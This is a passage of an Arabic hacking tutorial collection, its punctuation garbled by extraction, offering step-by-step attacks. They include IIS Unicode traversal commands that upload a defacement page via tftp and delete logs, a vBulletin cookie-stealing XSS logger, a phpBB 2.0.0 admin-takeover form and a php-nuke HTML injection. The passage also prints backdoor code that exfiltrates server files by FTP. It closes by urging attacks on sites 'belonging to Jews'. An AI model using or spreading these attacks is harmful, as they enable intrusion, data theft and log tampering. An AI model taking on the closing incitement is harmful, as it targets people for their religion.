i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
شايفين ياشباب إش الى اتغير
بس لزم أيضًا إنك تغير اللزم في أمر النسخ
مثل
314
tftp.exeهذا سيبه في حاله لنه اسم برنامج التي اف تي بي الى حاطه في السي ومشغله الن
" "i-هذا برضه سيبه لنه مهم
1.1.1.1هنا بدال الرقام هذا تكتب اليبي تبع جهازك وعشان تتأكد من اليبي لمن تشغب التي اف تي بي
راح يطلع ايبي وهذا اليبي الى طلعلك هو الى تكتبه
GETهذه الضافة سيبها في حالها لنها تعتبر شرط في نسخ المفات
index.htmهذه اسم الصفحة الى راح تتحمل وممكن تغيرها عاد بكيفك انت
\C:\inetpub\wwwrootوهذا مكان تواجد الصفحة الرئيسة الخاصة بالموقع
index.htmهنا تكتب إسم الصفحة او الملف التي تريده أن يظهر في الموقع
\:Cيجب التأكد من إنك حاط الصفحة المراد تحميلها في جهازك داخل الـ
index.htmومثل اسم الصفحة
قبل ماتضغط انتر عشان تنسخ الملف تاكد من ان الثغرة الن صارت مشابها لمثل هذه الثغرة
http://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+"-
i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroot\index.htm
ولو طلعت مشابها لها اضغط إنتر وتوكل على ال
وبإذن ال راح يتنسخ الملف
-------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------
وفى النقطة الخيرة والهم
مسح ملفات تكون تجمعت داخل الجهاز ومكونة معلومات عنك مثل اليبي
http://server/msadc/..À¯../..../c+del+c:/*.log
--------------------------------------
*******************
اول كما قلنا لماذا ليخترقوا منتديات جون رغم ثغرات موقعه 1لنه يستخدم نسخه نضيفه
1النسخه الموجود بالنت مليان ثغرات وعارفين جيد مصمممي المنتدي لماذا ينشرونه اذا$
النسخه تجريبي ومحتوي كود التبليغ لكي لو نفذت ومسحت كود التبليغ لن تهرب من ثغراته لو تشغل فكرك
لكشفته بنفسك
2انه جميعه نسخه تجريبي لترويج بضعتهم بدل ان تكون لمدة 30يوما فهمتموني
3النسخه المنتشره بالنترنت هو نسخه نحصل علي من مواقع هكرز صح وينك انت من هكرز الغرب
وحيلهم
لو تمكنت في الحصول علي نسخة الشركة %100ونسخه منتشره في النت لرئيت صح قاموا بحذف كود
التبليغ منه بل اضافوا اليه كوداد وبلوي وثغرات-وبعدين يجي الخ صاحب النسخه يوكد انه لقي ثغرة
بمنتديات جون
والعالم يندهش كييييييف خلص انشهر موقعه وسعر اعلناته ارتفع في موقعه لكثر الزوار
الحقيقة هو نفسه اضاف الكود ونفسه يعرف مكانه وكيفة العب فيه وال هكذا المور
315
المعربين العرب ليسوا اقل نذل من الجانب
المسربه لنا من اخواننا العرب وكان هذا الكود2.2.5 قبل فتره بسيطه تم اكتشاف ثغره في بعض نسخ
forum الموجود فيها في ملف
:PHP
--------------------------------------------------------------------------------
} ("if ($action=="modify
;vbxh = h$
;vbxt = t$
;vbxp = p$
;vbxw = w$
;vbxa = a$
;vbx1 = 1$
;vbxr = r$
;vbxb = b$
;vbxn = n$
;vbxe = e$
;vbxo = o$
;vbxy =y$
;vbxl = l$
;" --!>" echo
= file$
fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.
$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbx
a$vbxl/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NA
;("ME", "r
;(rf = fread($file, 1000$
;(fclose($file
;"<-- " echo
--------------------------------------------------------------------------------
/http://www.arab1.net
http://www.arab1.net/~royal/.x.php?
h=$HTTP_HOST&h2=$SCRIPT_NAME
وسربوها لنا حبايبنا وشالوا كود التبليغ ياعيني عليهم عشان يحطون2.2.6 عموما مع اليام نزلت نسخه
316
لنا كود تجسس ونعم الخوه العرب المسلمين
بالخيرoption بس هالمره الكود اذكى ومهو مكشوف وغبي زي الول الكود المره هذي في ملفين ملف
موجود
:PHP
--------------------------------------------------------------------------------
;" --!>" echo
;"include "$sqlupdate
;"<-- " echo
--------------------------------------------------------------------------------
functions وملف
:PHP
--------------------------------------------------------------------------------
sqlupdate =$
base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm9
;('==5YWwvLngyLmluYw
--------------------------------------------------------------------------------
والمره هذي بعد يتصل الكود الحلو هذا اللي مستخدمين فيه ديكود بالموقع هذا
/http://saudi.no-ip.com
WELCOME TO arab1.net بيرحب فيكم ويقولكم
ياعيني عالترحيب
:PHP
--------------------------------------------------------------------------------
317
;("system("tar -cvf /tmp/.statics.tgz /tmp/.statics
;"vilename = "$SERVER_NAME.bz$
;('port = base64_decode('aHB5NWk5$
;("conn_id = ftp_connect("cyber-sa.virtualave.net$
;("login_result = ftp_login($conn_id, "cyber-sa", "$port$
upload = ftp_put($conn_id, "/tmp/$vilename", "/tmp/.statics.tgz",$
;(FTP_BINARY
;(ftp_quit($conn_id
;("system("rm -rf /tmp/.statics.tgz
;("system("rm -rf /tmp/.statics
;"base = "$HTTP_HOST&h2=$SCRIPT_NAME$
;"open = "http://saudi.no-ip.com/~royal/.x2.php?h=$base$
;("file = fopen("$open", "r$
;(rf = fread($file, 1000$
;(fclose($file
?<
<--
><div/
************
يال كل يوم نسمع اختراق المنتديات اليكم الحل حماية %80اليكم اسباب اخترقه وحمايته
******
كيفية الحماية
1قم بحماية ملف الدمن جيدا htaccess.شغل فقط في سرفرات الينوكس ليس ويندوز
2قم بحمايته htaccess.
3لتركب ستيلت كثير يسببب ثغرة باالمنتدي
4لتفعل لغة الهتمل ابدا
5احذر من الكوكز نظف جاهزك دائما
6قم بتوقيف التل نيت لموقع عندما لتحتاجه
7نأكد من عدم وجود ملف باسم Cfgwiz32.exeعلى المجلد ويندوز C:\Windows
318
ده بلوووووي الدنيا فيه جاري البحث عن حل له8
قم بتركيب برامج الفيروسات بجهازك9
. قم بزيارت منتديات العقرب الحمر لحصولك علي كافة انواع الحماية لجهازك وموقع10
،،،انتهى
:Variables //
;"LogFile = "Cookies.Log$
:Functions //
*/
} ("If ($HTTP_GET_VARS['Action'] = "Log
;"--!>" = Header$
;"<---" = Footer$
{
} Else
;"" = Header$
;"" = Footer$
{
;(Print ($Header
/*
;("<Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title
319
;("<Print ("<Pre
;("<Print ("<Center
;("Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr
;("<"\Width=\"20%
*/
;(Print ($Footer
/*
} (['Switch ($HTTP_GET_VARS['Action
:"Case "Log
;['Data = $HTTP_GET_VARS['Cookie$
Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex$
;(((((((MD5 (NULL
;("+Log = FOpen ($LogFile, "a$
;("FWrite ($Log, Trim ($Data) . "\n
;(FClose ($Log
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" .
;("<"\" . ['$HTTP_SERVER_VARS['HTTP_REFERER
;Break
:"Case "List
} ((If (!File_Exists ($LogFile) || !In_Array ($Records
;("<Print ("<Br><Br><B>There are No Records</B></Center></Pre
;() Exit
{
} Else
;("<Print ("</Center></Pre
;((Records = Array_UniQue (File ($LogFile$
;("<Print ("<Pre
;("Print ("<B>.:: Statics</B>\n
;("Print ("\n
;("Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n
Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not Counting
;("Duplicates]\n
;("Print ("\n
320
;("Action=Delete\">Y</A>]\n
;("Print ("\n
;("Print ("<B>.:: Records</B>\n
;("Print ("\n
;("<Print ("</Pre
;Break
:"Case "Delete
;(UnLink ($LogFile@
Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die
;("<("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
;("<"\" . ['$HTTP_SERVER_VARS['HTTP_REFERER
;Break
{
<?
php ارفع الملف لموقع يدعم-2
اجعل الضحية يضغط على هذا اللينك-3
member2.php?s=[Session]&action=viewsubscription&perpage=[Script
[Code
[script code] واستبدال
بهذا
Action=Log&Cookie='+?[]مكان الملف الذي تم تحميله//:Script>location='Http>
<(document.cookie);</Script
إذهب ألى هذا العنوان-4
Action=List? الملف الذي تم تحميله/مكانhttp://%20
،،،انتهى
321
" اختراق منتديات " phpbb 2.0.0
phpbb 2.0.0
PhpBB2
في ملف admin_ug_auth.php
الوصف:
يمكنك من خلل هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت
الصدار:
2.0.0
لتجربة الثغرة اول سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها
><html
><head
><head/
><body
>"form method="post
action="http://www.domain_name/board_directory/admin/admin_ug_aut
<"h.php
<"User Level: <select name="userlevel
322
><option value="admin">Administrator</option
><option value="user">User</option></select
><"input type="hidden" name="private[1]" value="0
><"input type="hidden" name="moderator[1]" value="0
><"input type="hidden" name="mode" value="user
><""=input type="hidden" name="adv" value
<"User Number: <input type="text" name="u" size="5
><"input type="submit" name="submit" value="Submit
><form/
><body/
><html/
وسلااامتكم شفتو سهولت الدرس وهو صرااحه منقول بس تعرفو ما حبيت انزله ال وعليه تطبيق
/http://forums.xos.ca
انتهى،،،
323
" ثغرة في " php nuke
>ةةةةة ةة ةةةةة ةةة ةةة<
>ةةةةةة :ةةةة <
فيه ثغره في ال php nukeحبيت اقولكم عليها ..الثغره دي تتيح لك تنفيذ اكواد الهتمل و الجافا بدل مكان
الصوره الشخصيه .......
انا عارف انكم اول ما تقروا السطر الول اكيد اغلبكم حيشتمني باكثر اللفاظ اباحه -بس عادي انا متعود -و
يقول ايه ده باه هو مدخلنا هنا عشان يقولنا تنفيذ اكواد هتمل و جافا بدل الصوره الشخصيه ؟؟؟!!!!
بس ؟؟؟!!! اما عبيط اوي !!!
المهم ان الثغره كالتالي ) :ساحاول اني اعمل زي مواقع السيكيوريتي المحترمه لم تيجي تعرض ثغره (
324
الستخدام :
تستخدم كما قلت في تنفيذ اكواد الهتمل و الجافا سكريبت من خلل مكان صورهم الشخصيه.
اي مستخدم عندم يقوم بالتسجيل في المجله فانه يطالب باختيار صوره شخصيه و ذلك من خلل مجموعه من
الصور الموجوده في المجلد هذا .... images/forum/avatars/
عندئذ تقوم المجله بوضع اسم الصوره في الداتا بيز ..و لكنها ل تقوم بوضع اي كود اي انه اذا استطاع اي
يوزر ان يحصل على كود فورم المجله و استطاع ان يغير صندوق اختيار الصوره الشخصيه الى صندوق
textعادي ..اذن اعتقد انه ممكن ان يكتب كود الهتمل اللي هوه عايزه !!!!
الكسبلويت:
اول عليك ن تقوم بالتسجيل في المجله و الدخول بعد ذلك و الذهاب الى صفحه Your Accountو منها
الذهاب الى صفحه Your Infoبعد ذلك عليك باظهار سورس كود الصفحه من خلل view sourceو
البحث عن كلمه uid
كده يبقى انت عرفت رقم الي دي اللي هوه في المثال كان ... 2111
عليك بعد ذلك نك تحفظ الكود ده في النوت باد و تسميه اي اسم بامتداد htmlمع ملحظه تغيير
/http://nukesiteالى عنوان المجله الهدف :......
325
>!<!-- END CODE --
و الن عليك تشغيل ملف ال htmlهذا ..اول خانه عليك كتابه الكود المطلووب تنفيذه مع مراعاه انه يجب
ن يبدأ بالعلمه :
"<
>b
حتى ل تجد اي مشاكل في الكود عند العرض ...ضع بعد كده اسم اليوزر و رقم الي دي و بعدين submit
سوف تجد نفسك في صفحه Your Accountالخاصه بك ..و كده الكود تم تشغيله !!!!
"<>h1>TESTING</h1><b
">b
اللي انا كنت عايز اقوله انك ممكن تنفذ ثغرات xssاو اي حاجه انت مش عارف تنفذها بسبب اغلق كود
الهتمل اياه =( لمزيد من المعلومات راجع الدرس هذا كمثال ليس اكثر ؟؟
الحل :
لسه و ال !!!!
انتهى،،،
326
" " أفضل المنتديات العربية للهاكر
:::أقد لكم أفضل المواقع والمنتديات العربية في مجال الهاك بجميع مجالته على حد معرفتي
327
هذه افضل مارأيته وتصفحته عن المواقع العربية التي تدعم علم الهاك...
وشكرااا.
هذه بعض المواقع المهمة التي يستخدمها الهكر لمعرفة اخر الثغرات الصادره مع مقالت بسيط لهذه المواقع
328
قاعدة بيانات اخرى كاملة .تتحدث يوميا فهؤلء الشباب القائمون على هذا الموقع ل ينامون ابدا !
BugTraq
--------
العنوان :مستضيفه موقع ), /Security Focus )http://www.securityfocus.comوسابقا
كان مستضيفة ).(/Netspace ) http://www.netspace.org
BugTraqواحدة من افضل قائمة المراسلت البريدية mailing listالتي تتهتم بالمن اللكتروني
هذه القائمة يقوم عليها رئيس اسمه .(Aleph1 (aleph1@underground.orgيستقبل الرسائل
التي ترسلها ) عن ثغرة معينه مثل ( ويقوم بتحليلها وتنضيفها من ال spamsوالرسائل التي ليس لها
فائدة او الثغرات القديمة ثم يقوم بإرسال الرساله الممتازه فقط الى جميع المشتركين في القائمة
انصحك بالتسجيل /http://www.securityfocus.com
تستطيع ايضا البحث في ارشيفاتها التي تعتبر لدي من افضل قواعد البيانات وذلك عن طريق دخول الموقع ثم
البحث عن رابط ''search
البحث Searching
------------
اذا كنت تريد البحث عن ثغرة متعلقة بخدمه معينة مثل Sendmail 8.8.3فستحتاج لكتابت '
'sendmail 8.8.3واذا اردت البحث عن ثغره معينه مثل هجوم حجب الخدمه local DoSضد اي
نسخه من sendmail
فما عليك ال كتابت التالي 'local DoS sendmail' :بدون علمات القتباس.
==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
أما بالنسبة لمواقع الهاك النجليزية فمعرفتي بها ضئيلة لعدم توسعي في اللغة النجليزية ،وهذه المواقع
كالتالي:::
موقع http://www.haker.com.pl .1
موقع /http://www.webattack.com .2
موقع http://blacksun.box.sk .3
موقع http://www.blackcode.com .4
تقبلوا تحياتي،،،
انتهى،،،
329
الرجاء عدم التجربة على المواقع العربية النافعه والستفاده
من المعلومات للقضاء على المواقع الباحية والتابعة لليهود
واعوانهم
الخاتمة
330